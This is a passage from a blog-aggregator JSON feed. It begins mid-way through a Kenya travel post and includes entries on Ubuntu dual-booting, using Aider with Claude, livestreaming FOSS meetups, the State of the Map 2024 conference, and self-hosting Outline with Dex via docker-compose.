Dominic agreed to send me pictures of his jersey. I liked his jersey and collected it from him. I gave him 2000 shillings, an amount suggested by those Indian players.\n\n      \nMe with players at the Nairobi Gymkhana Club\n\n      \nCricket pitch at the Nairobi Gymkhana Club\n\n      \nA view of the cricket ground inside the Nairobi Gymkhana Club\n\n      \nScoreboard at the Nairobi Gymkhana cricket ground\nGiraffe Center in Nairobi\nKenya is known for its safaris and has no shortage of national parks. In fact, Nairobi is the only capital in the world with a national park. I decided not to visit one, as most of them were expensive and offered multi-day tours, and I didn’t want to spend that much time in the wildlife.\nInstead, I went to the Giraffe Center in Nairobi with Pragya and Rabina. The ticket cost 1500 Kenyan shillings (1000 Indian rupees). In Kenya, matatus - shared vans, usually decorated with portraits of famous people and play rap songs - are the most popular means of public transport.  Reaching the Giraffe Center from our hotel required taking five matatus for 150 shillings and a 2 kilometer walk. The journey back was 90 shillings, suggesting that we didn’t find the most efficient route to get there. At the Giraffe Center, we fed giraffes and took photos.\n\n      \nA matatu with a Notorious BIG portrait.\n\n      \nInside the Giraffe Center\nTrain ride from Nairobi to Mombasa\nI wanted to visit a place outside of Nairobi. Mombasa being a coastal city and the second-largest in Kenya was a natural choice. It is 500 kilometers from the capital Nairobi. I love trains in general, so I decided to take the SGR train from Nairobi to Mombasa. I tried reserving a seat for myself from home, but found out that the train could only be booked using M-PESA. It is a mobile bank transfer system in Kenya, and I didn’t have an M-PESA account. Therefore, I could not book my ticket in advance. When I was in Kenya, I was helped by Pragya’s friend Mary for booking my ticket. It was a second-class ticket for 1500 shillings (1000 Indian rupees).\nIf you are a tourist, note that local shops in Kenya can facilitate such an M-PESA transfer in exchange for cash. Your hotel may also be providing such a service, so make sure to check with them.\nThe train was scheduled to depart from Nairobi at 08:00 hours in the morning and arrive in Mombasa at 14:00 hours. The security check at the station required scanning bags and having them sniffed by sniffer dogs. I also fell victim to a scam by a security official who offered to help me get my ticket printed, only to later ask me to get him some coffee, which I politely declined.\nBefore boarding the train, I was treated to some stunning views at the Nairobi Terminus station. It was a seating train, but I wished it were a sleeper train, as I was sleep-deprived. The train was neat and clean, with good toilets. It reached Mombasa on time.\n\n      \nSGR train at Nairobi Terminus.\n\n      \nInterior of the SGR train\nArrival in Mombasa\n\n      \nMombasa Terminus station.\nMombasa was a bit hotter than Nairobi, with temperatures reaching around 30 degrees Celsius. However, that’s not too hot for me, as I am used to higher temperatures in India. I had booked a hostel in the Old Town and was searching for a hitchhike from the Mombasa Terminus station. After trying for more than half an hour, I took a matatu that dropped me 3 km from my hostel for 200 shillings (140 Indian rupees). I tried to hitchhike again but couldn’t find a ride.\nI think I know why I couldn’t get a ride in both the cases. In the first case, the Mombasa Terminus was in an isolated place, so most of the vehicles were taxis or matatus while any noncommercial cars were there to pick up friends and family. If the station were in the middle of the city, there would be many more car\u002Ftruck drivers passing by, thus increasing my possibilities of getting a ride. In the second case, my hostel was at the end of the city, and nobody was going towards that side. In fact, many drivers told me they would love to give me a ride, but they were going in some other direction.\nFinally, I took a tuktuk for 70 shillings to reach my hostel, Tulia Backpackers. It was 11 USD (1400 shillings) for one night. The balcony gave a nice view of the Indian Ocean. The rooms had fans, but there was no air conditioning. Each bed also had mosquito nets. The place was walking distance of the famous Fort Jesus. Mombasa has had more Islamic influence compared to Nairobi and also has many Hindu temples.\n\n      \nThe balcony at Tulia Backpackers Hostel had a nice view of the ocean.\n\n      \nA room inside the hostel with fans and mosquito nets on the beds\nVisiting White Sandy Beaches and Hitchhiking\nVisiting Nyali beach marked my first time ever at a white sand beach. It was like 10 km from the hostel. The next day, I visited Diani Beach, which was 30 km from the hostel. Going to Diani Beach required crossing a river, for which there’s a free ferry service every few minutes, followed by taking a matatu to Ukunda and then a tuk-tuk. The journey gave me a glimpse of the beautiful countryside of Kenya.\n\n      \nNyali beach is a white sand beach\n\n      \nThis is the ferry service for crossing the river.\nDuring my return from Diani Beach to the hostel, I was successful in hitchhiking. However, it was only a 4 km ride and not sufficient to reach Ukunda, so I tried to get another ride. When a truck stopped for me, I asked for a ride to Ukunda. Later, I learned that they were going in the same direction as me, so I got off within walking distance from my hostel. The ride was around 30 km. I also learned the difference between a truck ride and a matatu or car ride. For instance, matatus and cars are much faster and cooler due to air conditioning, while trucks tend to be warmer because they lack it. Further, the truck was stopped at many checkpoints by the police for inspections as it carried goods, which is not the case with matatus. Anyways, it was a nice experience, and I am grateful for the ride. I had a nice conversation with the truck drivers about Indian movies and my experiences in Kenya.\n\n      \nDiani beach is a popular beach in Kenya. It is a white sand beach.\n\n      \nSelfie with truck drivers who gave me the free ride\nBack to Nairobi\nI took the SGR train from Mombasa back to Nairobi. This time I took the night train, which departs at 22:00 hours, reaching Nairobi at around 04:00 in the morning. I could not sleep comfortably since the train only had seater seats.\nI had booked the Zarita Hotel in Nairobi and  had already confirmed if they allowed early morning check-in. Usually, hotels have a fixed checkout time, say 11:00 in the morning, and you are not allowed to stay beyond that regardless of the time you checked in. But this hotel checked me in for 24 hours. Here, I paid in US dollars, and the cost was 12 USD.\nAlmost Got Stuck in Kenya\nTwo days before my scheduled flight from Nairobi back to India, I heard the news that the airports in Kenya were closed due to the strikes. Rabina and Pragya had their flight back to Nepal canceled that day, which left them stuck in Nairobi for two additional days. I called Sahil in India and found out during the conversation that the strike was called off in the evening. It was a big relief for me, and I was fortunate to be able to fly back to India without any changes to my plans.\n\n      \nNewspapers at a stand in Kenya covering news on the airport closure\nExperience with locals\nI had no problems communicating with Kenyans, as everyone I met knew English to an extent that could easily surpass that of big cities in India. Additionally, I learned a few words from Kenya’s most popular local language, Swahili, such as “Asante,” meaning “thank you,” “Jambo” for “hello,” and “Karibu” for “welcome.” Knowing a few words in the local language went a long way.\nI am not sure what’s up with haggling in Kenya. It wasn’t easy to bring the price of souvenirs down. I bought a fridge magnet for 200 shillings, which was the quoted price. On the other hand, it was much easier to bargain with taxis\u002Ftuktuks\u002Fmotorbikes.\nI stayed at three hotels\u002Fhostels in Kenya. None of them had air conditioners. Two of the places were in Nairobi, and they didn’t even have fans in the rooms, while the one in Mombasa had only fans. All of them had good Wi-Fi, except Tulia where the internet overall was a bit shaky.\nMy experience with the hotel staff was great. For instance, we requested that the Nairobi Transit Hotel cancel the included breakfast in order to reduce the room costs, but later realized that it was not a good idea. The hotel allowed us to revert and even offered one of our missing breakfasts during dinner.\nThe staff at Tulia Backpackers in Mombasa facilitated the ticket payment for my train from Mombasa to Nairobi. One of the staff members also gave me a lift to the place where I could catch a matatu to Nyali Beach. They even added an extra tea bag to my tea when I requested it to be stronger.\nFood\nAt the Nairobi Transit Hotel, a Spanish omelet with tea was served for breakfast. I noticed that Spanish omelette appeared on the menus of many restaurants, suggesting that it is popular in Kenya. This was my first time having this dish. The milk tea in Kenya, referred to by locals as “white tea,” is lighter than Indian tea (they don’t put a lot of tea leaves).\n\n      \nSpanish Omelette served in breakfast at Nairobi Transit Hotel\nI also sampled ugali with eggs. In Mombasa, I visited an Indian restaurant called New Chetna and had a buffet thali there twice.\n\n      \nUgali with eggs.\nTips for Exchanging Money\nIn Kenya, I exchanged my money at forex shops a couple of times. I received good exchange rates for bills larger than 50 USD. For instance, 1 USD on xe.com was 129 shillings, and I got 128.3 shillings per USD (a total of 12,830 shillings) for two 50 USD notes at an exchange in Nairobi, while 127 shillings, which was the highest rate at the banks. On the other hand, for smaller bills such as a one US dollar note, I would have got 125 shillings. A passport was the only document required for the exchange, and they also provided a receipt.\nMy advice for travelers would be to keep 50 USD or larger bills for exchanging into the local currency while saving the smaller US dollar bills for accommodation, as many hotels and hostels accept payment in US dollars (in addition to Kenyan shillings).\nMissed Malindi and Lamu\nThere were more places on my to-visit list in Kenya. But I simply didn’t have time to cover them, as I don’t like rushing through places, especially in a foreign country where there is a chance of me underestimating the amount of time it takes during transit. I would have liked to visit at least one of Kilifi, Watamu or Malindi beaches. Further, Lamu seemed like a unique place to visit as it has no cars or motorized transport; the only options for transport are boats and donkeys. But I missed Lamu as well.\nThat’s it for now. Meet you in the next one :)",[],{"slug":830,"title":831,"link":832,"pubDate":833,"contentSnippet":834,"tags":835,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"ubuntu-ssd-e0-ae-b2-e0-af-8d-e0-ae-89-e0-ae-aa-e0-af-81-e0-ae-a3-e0-af-8d-e0-ae-9f-e0-af-81-20-04-lt","Ubuntu : SSDல் உபுண்டு 20.04 LTS டூயல் பூட் முறையில் விண்டோசுடன் நிறுவுதல்","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F10\u002F31\u002Fubuntu-ssd%e0%ae%b2%e0%af%8d-%e0%ae%89%e0%ae%aa%e0%af%81%e0%ae%a3%e0%af%8d%e0%ae%9f%e0%af%81-20-04-lts-%e0%ae%9f%e0%af%82%e0%ae%af%e0%ae%b2%e0%af%8d-%e0%ae%aa%e0%af%82%e0%ae%9f%e0%af%8d-%e0%ae%ae\u002F","Thu, 31 Oct 2024 14:18:45 +0000","அக் 31, 2024 அண்மையில் நான் டூயல் பூட் முறையில் விண்டோசுடன் நிறுவிய அனுபவத்தினை இந்த பதிவில் காணலாம். நான் SSDல் விண்டோஸ் இயங்குதளம் பயன்படுத்திவருகிறேன். என்னுடைய இன்னொரு HDDல் உபுன்டு இயங்குதளம் வைத்திருக்கிறேன். அந்த வன்வட்டு பழுதடையும் தருவாயில் இருப்பதால் SSDல் உபுண்டு இயங்குதளம் நிறுவ தயாரானேன். எப்பொழுதும் புதிய இயங்குதளம் நிறுவ தாயராகும் போது காப்பு பிரதி(Backup) எடுத்துவைத்து தயாராகவும். குறிப்பு : நான் இயங்குதளம் 3 முறை நிறுவியுள்ள அனுபவத்தில் காப்பு பிரதி […]",[836,837],"Linux","ubuntu",{"slug":839,"title":840,"link":841,"pubDate":842,"contentSnippet":843,"tags":844,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"using-llm","How I use LLMs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fusing-llm\u002F","2024-10-30T00:00:00.000Z","Just yesterday, GitHub announced integrating Claude 3.5 Sonnet with Copilot. Interesting times ahead. In my experience, Claude has been remarkably better than the GPT-4 family of models for programming tasks. I’ve tried a bunch of tools like Cursor, Continue.dev but finally settled with Aider for most of my tasks. In this post, I want to write about my workflow of using Aider when working on small coding tasks.\nAider is an open source Python CLI which supports multiple models, including Claude 3.5 Sonnet. Aider describes itself as “AI pair programming in your terminal”. The tool integrates git quite well in its workflow so it can edit files, create new files, and track all changes via git. In case you want to revert, simply reverting the commit or using the \u002Fundo shortcut would do the same.\nThe tool has multiple modes that serve different purposes:\n\u002Fask: Use it when you simply want to chat with the model about the codebase or explain some pieces of it. This mode won’t touch your files. It’s great for understanding existing code or getting explanations.\n\u002Farchitect: Use it to discuss a broad overall idea. The model will propose some changes to your files. You can further chat and tune it to your preferences.\n\u002Fcode: This will directly edit your files and commit them.\nMy typical workflow involves running Aider in a terminal while keeping VSCode open for manual code review. I often use the --no-auto-commits flag to view the diffs before committing. Despite advances in LLM technology, I believe they haven’t yet reached the stage where they can fully understand your team’s coding style guides, and I prefer not to have a certain style forced upon me. Manually tweaking portions of AI-generated functions still proves helpful and saves considerable time.\nTo begin, aider --sonnet would open the interactive window where you can begin writing prompts.\n\nTo add context, you need to add files using commands like \u002Fadd main.py. What makes Aider powerful is its control over the LLM context - you can \u002Fadd or \u002Fdrop source code, or even \u002Freset to drop all files and start with a fresh context. This granular control helps manage the context window effectively.\nA really cool thing about it is that it gives an approximate idea of the number of tokens (cost) associated with each prompt. I find it useful to remove unnecessary files from the context window, which not only helps in getting sharper, more accurate responses but also helps with the costs. There’s a nice \u002Ftokens command which will show the cost of sending each file added in context with the prompt.\n\nI find the Aider + Claude 3.5 combo works really well when you have a narrow-scoped, well-defined task. For example, this is the prompt I used on a codebase I was working on:\nTheme preference is not preserved when reloading pages or navigating to new pages. We should store this setting in localStorage. Please implement using standard best practices.\n\nUnder the hood, Aider uses tree-sitter to improve code generation and provide rich context about your codebase. Tree-sitter parses your code into an Abstract Syntax Tree (AST), which helps Aider understand the structure and relationships in your code. Unlike simpler tools that might just grep through your codebase, tree-sitter understands the actual syntax of your programming language.\nIt can identify function definitions, class declarations, variable scopes, and their relationships\nIt extracts full function signatures and type information\nIt builds a dependency graph showing how different parts of your code relate to each other\nIt helps rank the importance of different code sections based on how often they’re referenced\nThis means when you’re working on a task, Aider isn’t just blindly sending your entire codebase to the LLM. Instead, it creates an optimized “repository map” that fits within your token budget (default is 1k tokens, adjustable via --map-tokens). This map focuses on the most relevant pieces of your code, making sure the LLM understands the context without wasting tokens.\nAider’s approach to AI pair programming feels natural and productive. Here are some example prompts where it helped me build stuff in less than a minute:\nModify fetch method in store\u002Fstore.go to filter out expired entries\nWrite a k6 load test script to benchmark the POST \u002Fsubmit endpoint and simulate real-world traffic patterns\nCreate a Makefile, Dockerfile, goreleaser.yml for my Go binary. Target platforms: arm64 and amd64\n\nI prefer to invoke aider with a few extra flags:\naider --no-auto-commits --cache-prompts --cache-keepalive-pings 12 --no-suggest-shell-commands\nMake sure to go through the Tips page to effectively try out Aider on your existing projects.\nFin!",[],{"slug":846,"title":847,"link":848,"pubDate":849,"contentSnippet":850,"tags":851,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"08-fossmeetup-livestream-html","Streaming our FOSS Meetups using just freesoftware!","https:\u002F\u002Faryak.me\u002Fblog\u002F08-fossmeetup-livestream.html","Thu, 17 Oct 2024 12:39:45 +0000","I volunteer for FOSS United\nMumbai, and we organize meetups related to FOSS every month.\nWe have often done some hacky jugaad to stream our meetups, but due\nto their last minute nature and lack of proper resources, they have\noften been low quality or failed entirely.\nWith the on-ground experience I have gained as the live streaming\nlead at IndiaFOSS\n2024 and 2023, I wanted to\nput these ideas into a blog-post format, so this could help out the other chapters of FOSS\nUnited, and potentially non-FOSS United events too!\nMy guide is primarily divided into four parts:\nScrcpy, which deals with getting the video of the meetup by\n(ab)using the camera of your phone\nVDO.ninja, which retrieves a high quality, low-latency stream of the\nspeaker’s screen in a user-friendly manner\nOBS, which combines the outputs of both Scrcpy and VDO.ninja\ntogether with a nice template, to send to the streaming server (OSP, or\nperhaps YouTube)\nOSP (FOSS United specific), which is the web UI which we stream to,\nand use to make clips out of the live stream\nA large part of the guide assumes you use linux, but it should work\nwith MacOS. PS: if you are hosting a FOSS Meetup, streaming from a\nMac\u002FWindows Box doesn’t make much sense either way :-)\nScrcpy Setup\nRequirements:\nLaptop with Linux\u002FMacOS (only tested with linux though)\nScrcpy 2.x\nAndroid 12+ phone\nOn the phone:\nEnable Developer Options by tapping Build Number 7 times in the\nSoftware Information section of About Phone in the Settings app. \nGo to the newly enabled developer options menu, allow USB Debugging.\n\nConnect phone to the laptop via USB, and authorize the Laptop\n\nIf there is no option asking you to authorize, there should be a\nsilent notification in your notif tray regarding USB preferences. Click\nthat and select ADB (if not available, chose file transfer - that should\nbe an equivalent option) \nIt might also be that the cable is old\u002Fdamaged, and does not support\ndata transfer. If previous option didn’t yield any results, try using a\ndifferent cable\n\n\nOn the laptop:\nInstall ADB\nInstall Scrcpy (Linux\n| MacOS\n| Windows)\nRun this command:\n\u002Fusr\u002Flocal\u002Fbin\u002Fscrcpy --video-source=camera --camera-id=0 --audio-source=mic --orientation=90\n\nSometimes the ideal resolution and framerate will not be the perfect\n16:9 one that is required. In that case, add the following argument:\n--camera-size=1920x1080 --camera-fps=60\nIf you want to add any custom settings, consult this other\nblogpost of mine or the\nscrcpy docs\nIf you want a landscape camera output, remove the –orientation\nflag\nSetting the camera ID to 0 should use the back camera by default,\nbut if front camera needs to be used, set the ID to 1\n\nThis should open a window with a full-sized preview of the camera:\n\nScreensy \u002F Screenshare Setup\nI would recommend you use this instead of VDO.ninja, ONLY IF BOTH\nDEVICES ARE ON SAME NETWORK\u002FWIFI.\nThe Setup\nOn the speaker’s laptop, open https:\u002F\u002Fscreensy.marijn.it. Start\nscreen sharing and note down the URL (making sure that the text that\nfollows the # is included)\nVDO.Ninja \u002F Screenshare Setup\nNOTE: YOU ARE BETTER OFF USING SCREENSY INSTEAD - UNLESS YOU CANNOT\nGET BOTH LAPTOPS ON THE SAME NETWORK.\nRequirements:\nA browser which supports screenshare on the speaker’s PC, any\nbrowser on the streaming PC\nThe Setup:\nOn streaming PC, open vdo.ninja, and create a room. Give a valid\nroom name, and set the option select the “The guests can see the\ndirector, but not other guests’ videos” option, and then enter the\ncontrol centre \nFrom the control centre, copy the link to invite a guest, and ask\nthe next speaker to open it on his laptop. \nOn the speaker’s laptop, select screenshare with room, and then in\nthe settings cogweel, make it use highest quality. \nBack on the streaming PC in the control centre, press highlight on\nthe newly appeared preview, and then copy link of “capture a group\nscene”. Keep the link safe, its needed in the next OBS setup \nOpen\nStreaming Platform Setup (specific to FOSS United)\nOn https:\u002F\u002Fstream.fossunited.org, each city chapter\u002Ffoss club can\nrequest an account for streaming and uploading their talks. Login to the\naccount that is provided to you, navigate to My Channels and create a\nnew channel.\nAdd the specific details like default title, description, profile\npicture etc., and then copy the auto-generated stream key.\nIf you want to stream simultaneously to youtube, you can add a new\nRTMP Restream Destination in this format:\nrtmp:\u002F\u002Fa.rtmp.youtube.com\u002Flive2\u002F\u003CSTREAM KEY>, and\nenable the new destination. By doing this, all new streams will be\nsimultaneously streamed to YouTube as well. \nMaking a clip for each talk\nAfter the live stream has ended, you might want to separate the\nstream into smaller chunks, with a separate video for each of the talks.\nThis can be done using the clips feature of OSP.\nOnce the stream ends, the stream will be converted into a recording\nand uploaded on to the channel from where it was being streamed.\nOpen the video, and in it the cogweel, from where you can select the\ncreate clip option. Using the slider, move to the desired start and end\npoint, give it a valid description and title, and then create the clip.\nA video is attached for reference:\nVideo\nOBS Setup\nRequirements:\nOBS Installation, with the default browser plugin enabled (the\nplugin is not enabled on debian as of writing FYI, so use the flatpak\nversion if on Debian)\n\n\nAn X11 environment (if under wayland, run\nenv -u WAYLAND_DISPLAY obs\n\n\nRun setup wizard, optimize for streaming, and use 1920x1080 as\nthe base resolution. For stream key, enter the one from your service\nprovider (if you are using OSP, consult the next section)\n\n\nDisable MIC\u002FAUX, and keep Desktop Audio enabled\n\n\nIn OBS, add a window source (Labelled XComposite Window Capture\non linux) for scrcpy\n\n\nIn OBS, add a browser source, and make the url point towards the\nscreensy link that you copied initially. If you are using VDO.ninja\ninstead, the url will be the one from the “capture group scene” from the\nVDO.ninja setup.\n\n\nAt the end, it should look something like this: \n\n\nStart streaming!",[852],"2024\u002F10\u002F17\u002F4",{"slug":854,"title":855,"link":856,"pubDate":857,"contentSnippet":858,"tags":859,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"decentralised-open-indexes","Decentralised Open Indexes for Discovery (DOID)","https:\u002F\u002Fnadh.in\u002Fblog\u002Fdecentralised-open-indexes\u002F","Wed, 02 Oct 2024 00:00:00 +0000","TLDR; A conceptual and technical framework for resource discovery on the WWW using decentralised, open, machine-readable indexes as the building block, free of eroding quality and gatekeeping by BigSearch™ and BigPlatform™, whose goals are not quality, but revenue.",[],{"slug":861,"title":862,"link":863,"pubDate":864,"contentSnippet":865,"tags":866,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"sotm-2024","State of the Map Conference in Kenya","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsotm-2024\u002F","Tue, 01 Oct 2024 19:35:30 +0530","Last month, I traveled to Kenya to attend a conference called State of the Map 2024 (“SotM” for short), which is an annual meetup of OpenStreetMap contributors from all over the world. It was held at the University of Nairobi Towers in Nairobi, from the 6th to the 8th of September.\n\n      \nUniversity of Nairobi.\nI have been contributing to OpenStreetMap for the last three years, and this conference seemed like a great opportunity to network with others in the community. As soon as I came across the travel grant announcement, I jumped in and filled the form immediately. I was elated when I was selected for the grant and couldn’t wait to attend. The grant had an upper limit of €1200 and covered food, accommodation, travel and miscellaneous expenses such as visa fee.\nPre-travel tasks included obtaining Kenya’s eTA and getting a yellow fever vaccine. Before the conference, Mikko from the Humanitarian OpenStreetMap Team introduced me to Rabina and Pragya from Nepal, Ibtehal from Bangladesh, and Sajeevini from Sri Lanka. We all booked the Nairobi Transit Hotel, which was within walking distance of the conference venue. Pragya, Rabina, and I traveled together from Delhi to Nairobi, while Ibtehal was my roommate in the hotel.\n\n      \nOur group at the conference.\nThe venue, University of Nairobi Towers, was a tall building and the conference was held on the fourth, fifth and sixth floors. The open area on the fifth floor of the building had a nice view of Nairobi’s skyline and was a perfect spot for taking pictures. Interestingly, the university had a wing dedicated to Mahatma Gandhi, who is regarded in India as the Father of the Nation.\n\n      \nView of Nairobi's skyline from the open area on the fifth floor.\n\n      \nA library in Mahatma Gandhi wing of the University of Nairobi.\nThe diversity of the participants was mind-blowing, with people coming from a whopping 54 countries. I was surprised to notice that I was the only participant traveling from India, despite India having a large OpenStreetMap community. That said, there were two other Indian participants who traveled from other countries. I finally got to meet Arnalie (from the Phillipines) and Letwin (from Zimbabwe), both of whom I had only met online before. I had met Anisa (from Albania) earlier during DebConf 2023. But I missed Mikko and Honey from the Humanitarian OpenStreetMap Team, whom I knew from the Open Mapping Guru program.\nI learned about the extent of OSM use through Pragya and Rabina’s talk; about the logistics of running the OSM Board, in the OSMF (OpenStreetMap Foundation) session; about the Youth Mappers from Sajeevini, about the OSM activities in Malawi from Priscilla Kapolo, and about mapping in Zimbabwe from Letwin. However, I missed Ibtehal’s lightning session. The ratio of women speakers and participants at the conference was impressive, and I hope we can get such gender representation in our Delhi\u002FNCR mapping parties.\n\n      \nOne of the conference halls where talks took place.\nOutside of talks, the conference also had lunch and snack breaks, giving ample time for networking with others. In the food department, there were many options for a lacto-ovo vegetarian like myself, including potatoes, rice, beans, chips etc. I found out that the milk tea in Kenya (referred to as “white tea”) is usually not as strong compared to India, so I switched to coffee (which is also called “white coffee” when taken with milk). The food wasn’t spicy, but I can’t complain :) Fruit juices served as a nice addition to lunch.\n\n      \nOne of the lunch meals served during the conference.\nAt the end of the second day of the conference, there was a surprise in store for us — a bus ride to the Bao Box restaurant. The ride gave us the experience of a typical Kenyan matatu (privately-owned minibuses used as share taxis), complete with loud rap music. I remember one of the songs being Kraff’s Nursery Rhymes. That day, I was wearing an original Kenyan cricket jersey - one that belonged to Dominic Wesonga, who represented Kenya in four ODIs. This confused Priscilla Kapolo, who asked if I was from Kenya! Anyway, while it served as a good conversation starter, it didn’t attract as much attention as I expected :) I had some pizza and chips there, and later some drinks with Ibtehal. After the party, Piyush went with us to our hotel and we played a few games of UNO.\n\n      \nMinibus which took us from the university to Bao Box restaurant.\n\n      \nThis minibus in the picture gave a sense of a real matatu.\nI am grateful to the organizers Laura and Dorothea for introducing me to Nikhil when I was searching for a companion for my post-conference trip. Nikhil was one of the aforementioned Indian participants, and a wildlife lover. We had some nice conversations; he wanted to go to the Masai Maara Natural Reserve, but it was too expensive for me. In addition, all the safaris were multi-day affairs, and I wasn’t keen on being around wildlife for that long. Eventually I chose to go my own way, exploring the coastal side and visiting Mombasa.\nWhile most of the work regarding the conference was done using free software (including the reimbursement form and Mastodon announcements), I was disappointed by the use of WhatsApp for coordination with the participants. I don’t use WhatsApp and so was left out. WhatsApp is proprietary software (they do not provide the source code) and users don’t control it. It is common to highlight that OpenStreetMap is controlled by users and the community, rather than a company - this should apply to WhatsApp as well.\nMy suggestion is to use XMPP, which shares similar principles with OpenStreetMap, as it is privacy-respecting, controlled by users, and powered by free software. I understand the concern that there might not be many participants using XMPP already. Although it is a good idea to onboard people to free software like XMPP, we can also create a Matrix group, and bridge it with both the XMPP group and the Telegram group. In fact, using Matrix and bridging it with Telegram is how I communicated with the South Asian participants. While it’s not ideal - as Telegram’s servers are proprietary and centralized - but it’s certainly much better than creating a WhatsApp-only group. The setup can be bridged with IRC as well. On the other hand, self-hosted mailing lists for participants is also a good idea.\nFinally, I would like to thank SotM for the generous grant, enabling me to attend this conference, meet the diverse community behind OSM and visit the beautiful country of Kenya. Stay tuned for the blog post on Kenya trip.\nThanks to Sahilister, Contrapunctus, Snehal and Badri for reviewing the draft of this blog post before publishing.",[],{"slug":868,"title":869,"link":870,"pubDate":871,"contentSnippet":872,"tags":873,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-end-of-suffering","The End of Suffering","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-end-of-suffering\u002F","Tue, 01 Oct 2024 06:10:22 +0000","I think the purpose of meditation matters a lot. If we are after enlightenment, then its pursuit becomes a craving in itself and that ends up being a hindrance. However, if our intention is to end suffering, then we have a far more practical goal and infact letting go of craving becomes so much more […]",[148],{"slug":875,"title":876,"link":877,"pubDate":878,"contentSnippet":879,"tags":880,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-outline","Self Hosting Outline Wiki","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-outline\u002F","2024-09-20T00:00:00.000Z","I recently discovered Outline a collaborative knowledge base. I wanted to self-host it on my server, but the mandatory auth provider requirement was off-putting. My server is on a private encrypted network (Tailscale) that only my approved devices in the tailnet can access, so I don’t really need authentication for my personal single-use apps. I found a few guides using Authelia\u002FKeycloak, but these are heavy-duty applications that would consume a lot of resources (DBs, caches, proxies, and whatnot) just to have an OIDC provider for Outline.\nThere had to be a simpler way, right? Enter Dex. As recommended by my friend and colleague Chinmay, it turned out to be quite easy.\nHere’s the full docker-compose.yml setup you need to get Outline up and running on your local instance!\nservices:\n\n  outline:\n    image: docker.getoutline.com\u002Foutlinewiki\u002Foutline:latest\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"3000:3000\"\n    volumes:\n      - storage-data:\u002Fvar\u002Flib\u002Foutline\u002Fdata\n    depends_on:\n      - postgres\n      - redis\n    environment:\n      PGSSLMODE: disable\n\n  redis:\n    image: redis\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"6379:6379\"\n    healthcheck:\n      test: [ \"CMD\", \"redis-cli\", \"ping\" ]\n      interval: 10s\n      timeout: 30s\n      retries: 3\n\n  postgres:\n    image: postgres\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"5432:5432\"\n    volumes:\n      - database-data:\u002Fvar\u002Flib\u002Fpostgresql\u002Fdata\n    healthcheck:\n      test: [ \"CMD\", \"pg_isready\", \"-d\", \"outline\", \"-U\", \"user\" ]\n      interval: 30s\n      timeout: 20s\n      retries: 3\n    environment:\n      POSTGRES_USER: 'user'\n      POSTGRES_PASSWORD: 'pass'\n      POSTGRES_DB: 'outline'\n\n  dex:\n    image: dexidp\u002Fdex:v2.35.3\n    ports:\n      - \"5556:5556\"\n    volumes:\n      - .\u002Fdex:\u002Fetc\u002Fdex\n    command: [ \"dex\", \"serve\", \"\u002Fetc\u002Fdex\u002Fconfig.yaml\" ]\n\nvolumes:\n  storage-data:\n  database-data:\n\nYou’ll need to add the following env variables as well\nNODE_ENV=production\nSECRET_KEY=your-key\nUTILS_SECRET=your-key\nDATABASE_URL=postgres:\u002F\u002Fuser:pass@postgres:5432\u002Foutline\nPGSSLMODE=disable\nREDIS_URL=redis:\u002F\u002Fredis:6379\nURL=http:\u002F\u002Flocalhost:3000\nPORT=3000\nFILE_STORAGE=local\nFILE_STORAGE_LOCAL_ROOT_DIR=\u002Fvar\u002Flib\u002Foutline\u002Fdata\nFILE_STORAGE_UPLOAD_MAX_SIZE=262144000\nOIDC_CLIENT_ID=outline\nOIDC_CLIENT_SECRET=outline-secret\nOIDC_AUTH_URI=http:\u002F\u002Flocalhost:5556\u002Fdex\u002Fauth\nOIDC_TOKEN_URI=http:\u002F\u002Fdex:5556\u002Fdex\u002Ftoken\nOIDC_USERINFO_URI=http:\u002F\u002Fdex:5556\u002Fdex\u002Fuserinfo\nOIDC_USERNAME_CLAIM=preferred_username\nOIDC_DISPLAY_NAME=Dex\nOIDC_SCOPES=openid profile email\nFORCE_HTTPS=false\nENABLE_UPDATES=true\nWEB_CONCURRENCY=1\nDEBUG=http\nLOG_LEVEL=info\nAnd finally, to configure Dex, we need the following config:\nissuer: http:\u002F\u002Flocalhost:5556\u002Fdex\n\nstorage:\n  type: sqlite3\n  config:\n    file: \u002Fvar\u002Fdex\u002Fdex.db\n\nweb:\n  http: 0.0.0.0:5556\n\nstaticClients:\n  - id: outline\n    redirectURIs:\n      - \"http:\u002F\u002Flocalhost:3000\u002Fauth\u002Foidc.callback\"\n    name: \"Outline\"\n    secret: outline-secret\n\noauth2:\n  skipApprovalScreen: true\n\nenablePasswordDB: true\n\nstaticPasswords:\n  - email: \"admin@example.com\"\n    hash: \"$2a$10$2b2cU8CPhOTaGrs1HRQuAueS7JTT5ZHsHSzYiFPm1leZck7Mc8T4W\"\n    username: \"admin\"\n    userID: \"08a8684b-db88-4b73-90a9-3cd1661f5466\"\nVoilà! With docker compose up, you’ll have an Outline server ready to go. You can log in using the admin user.",[],{"slug":882,"title":883,"link":884,"pubDate":885,"contentSnippet":886,"tags":887,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-10","Clojuring the web application stack: Meditation One","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fclojure-web-app-from-scratch\u002Findex.html","Sat, 24 Aug 2024 00:00:00 +0000","In a land bereft of a canonical \"killer app\" web framework or two, one must think about the what, why, how, where of all the moving parts. Out here, one must become a student of web framework architecture in addition to web application architecture. For here, in Clojure-land, the two are one. ☯",[52,533,888,456,531,530,457,54],"websites",{"slug":890,"title":891,"link":892,"pubDate":893,"contentSnippet":894,"tags":895,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"austrian-visa-refusal-jan-2024","My Austrian Visa Refusal 